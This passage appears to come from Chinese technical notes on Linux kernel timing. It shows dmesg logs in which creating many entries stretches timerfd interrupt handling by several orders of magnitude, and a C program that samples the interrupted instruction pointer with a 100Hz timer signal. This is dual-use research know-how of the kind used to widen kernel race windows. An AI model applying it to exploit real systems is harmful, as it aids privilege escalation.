系统正常运行的时候 tick 数大概在 3000 ～ 30000, 创建 500 * 500 个 entry 可以使cpu 运行时间增大 3～4 个数量级(测试虚拟机的CPU是单核 2000 MHz)

[ 1134.053250] [swapper/0] timerfd_triggered exit, 2976
[ 1134.053250] [swapper/0] timerfd_triggered enter
[ 1134.053250] [swapper/0] timerfd_triggered exit, 3970
[ 1134.552271] [swapper/0] timerfd_triggered enter
[ 1134.552906] [swapper/0] timerfd_triggered exit, 11616
[ 1175.552958] [swapper/0] timerfd_triggered enter
[ 1175.553871] [swapper/0] timerfd_triggered exit, 32663
[ 1176.052796] [swapper/0] timerfd_triggered enter
[ 1176.053719] [swapper/0] timerfd_triggered exit, 29340
[ 1184.738834] [swapper/0] timerfd_triggered enter
**[ 1184.739757] [swapper/0] timerfd_triggered exit, 27116541 // 500 * 500
...**
[ 1588.076916] [swapper/0] timerfd_triggered enter
**[ 1588.077841] [swapper/0] timerfd_triggered exit, 28924883 // 500 * 500
...**
[ 1596.735608] [swapper/0] timerfd_triggered enter
**[ 1596.736503] [swapper/0] timerfd_triggered exit, 28029898 // 500 * 500**
..
[ 1222.384483] [swapper/0] timerfd_triggered enter
**[ 1222.385381] [swapper/0] timerfd_triggered exit, 8511668 // 100 * 500**
...
[ 1265.026284] [swapper/0] timerfd_triggered enter
**[ 1265.027208] [swapper/0] timerfd_triggered exit, 1202548 // 10 * 500**

一种观测代码被中断位置的方法

原文的附录：

I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register

代码实现：

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <ucontext.h>
#include <sys/time.h>
#include <sys/user.h>
#include <time.h>
#include <sched.h>
#include <err.h>

/*
 * SYSCHK(expr): evaluate expr exactly once. If the result equals -1 (cast to
 * the expression's own type), report "SYSCHK(<expr text>)" together with the
 * errno description via err() and exit with status 1; otherwise yield the
 * result as the value of the macro.
 *
 * Uses a GNU statement expression. __typeof__ is spelled with underscores so
 * the macro also works under strict -std=c11, and the temporary avoids the
 * reserved "__" identifier prefix.
 */
#define SYSCHK(x) ({                       \
  __typeof__(x) syschk_res_ = (x);         \
  if (syschk_res_ == (__typeof__(x))-1)    \
    err(1, "SYSCHK(" #x ")");              \
  syschk_res_;                             \
})

/*
 * Restrict task `pid` to run only on CPU `cpu`.
 *
 * Builds an affinity mask with just that one CPU set and applies it with
 * sched_setaffinity(). SYSCHK terminates the program (via err()) if the
 * call returns -1, so this function only returns on success.
 */
void pin_task_to(int pid, int cpu) {
  cpu_set_t cset;
  CPU_ZERO(&cset);      /* start from an empty CPU mask */
  CPU_SET(cpu, &cset);  /* allow exactly one CPU */
  /* The argument text below is stringified into SYSCHK's error message. */
  SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
}
/* Pin the caller to `cpu`: forwards to pin_task_to() with pid 0. */
void pin_to(int cpu) {
  pin_task_to(0, cpu);
}

/*
 * SA_SIGINFO-style signal handler: pulls the saved RIP and RAX out of the
 * interrupted context (x86-64 register indices) and prints them.
 *
 * `signum` and `info` are unused; `context` is interpreted as a ucontext_t.
 * NOTE(review): printf() is not async-signal-safe in general; this relies on
 * the interrupted code not being inside stdio -- confirm for other callers.
 */
void timer_handler(int signum, siginfo_t *info, void *context) {
    const ucontext_t *uc = context;
    const greg_t *regs = uc->uc_mcontext.gregs;

    printf("Timer fired, PC = %p, rax: %ld\n",
           (void *) regs[REG_RIP], (long) regs[REG_RAX]);
}

/*
 * PC sampler demo: pin to CPU 0, install timer_handler for SIGALRM, start a
 * 100Hz CLOCK_MONOTONIC interval timer, then spin forever in a sequence of
 * `mov $N, %rax` instructions so the handler's rax value shows which
 * instruction the signal interrupted.
 *
 * Never returns normally; any failing setup call exits through SYSCHK.
 */
int main(void) {
    pin_to(0);

    // Set up the signal handler for SIGALRM
    struct sigaction sa;
    memset(&sa, 0, sizeof(sa));
    sa.sa_flags = SA_SIGINFO;
    sa.sa_sigaction = timer_handler;
    SYSCHK(sigaction(SIGALRM, &sa, NULL));

    // Start the timer (first expiry after one period, then periodic)
    struct itimerspec its;
    its.it_interval.tv_sec = 0;
    its.it_interval.tv_nsec = 10000000; // 10 ms period = 100Hz
    its.it_value = its.it_interval;
    timer_t timerid;
    // A NULL sigevent selects the default notification
    SYSCHK(timer_create(CLOCK_MONOTONIC, NULL, &timerid));
    SYSCHK(timer_settime(timerid, 0, &its, NULL));

    // Run a loop to generate some activity
    while (1) {
        __asm__ volatile (
            "mov $1, %%rax\n\t" // Move 1 to rax
            "mov $2, %%rax\n\t" // Move 2 to rax
            "mov $3, %%rax\n\t" // Move 3 to rax
            "mov $4, %%rax\n\t" // Move 4 to rax
            "mov $5, %%rax\n\t" // Move 5 to rax
            "mov $6, %%rax\n\t" // Move 6 to rax
            "mov $7, %%rax\n\t" // Move 7 to rax
            "mov $8, %%rax\n\t" // Move 8 to rax
            "mov $9, %%rax\n\t" // Move 9 to rax
            "mov $10, %%rax\n\t" // Move 10 to rax

            : // No output operand
            : // No input operand
            : "%rax" // Clobbered register
        );
        /*
         * Optional variant: to add a memory write to the loop, declare
         * `volatile int i;` before the loop and put `i = -1;` here.
         */
    }

    return 0;
}

概述